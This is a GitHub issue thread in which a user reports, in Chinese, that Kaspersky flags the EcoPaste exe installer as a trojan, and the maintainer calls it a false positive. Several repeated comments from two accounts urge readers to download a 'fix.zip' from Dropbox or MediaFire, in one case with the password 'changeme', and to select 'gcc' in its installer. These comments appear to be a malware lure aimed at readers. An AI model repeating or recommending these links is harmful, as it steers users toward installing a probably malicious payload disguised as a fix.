### ISSUE TITLE
[bug] 安装包报毒问题

### ISSUE THREAD

**Issue by Stardustll** [ayangweb/EcoPaste#451]
### Describe the bug

Windows11使用exe安装被卡巴斯基报毒（KES12.6），使用msi安装则没有问题

### Expected behavior

使用exe安装也不报毒

### Application and system information

```text
版本	Windows 11 专业版
版本	22H2
安装日期	‎2024/‎3/‎23
操作系统版本	22621.3296
体验	Windows Feature Experience Pack 1000.22687.1000.0

```

### Additional context

事件: 回滚已完成
应用程序: EcoPaste
用户类型: 发起者
组件: 行为检测
结果说明: 应用程序操作回滚
类型: 木马
名称: PDM:Trojan.Win32.Generic.nblk
威胁级别: 信息
对象类型: 进程
对象路径: D:\Desktop
对象名称: EcoPaste_0.0.6_x64-setup.exe

**Comment by pilot5657** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by ayangweb** [comment]
收到反馈，开源项目误报属于正常现象，如果方便的话可以直接到卡巴斯基提交误报反馈，谢谢🌹

**Comment by Stardustll** [comment]
好的，明白了👍

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
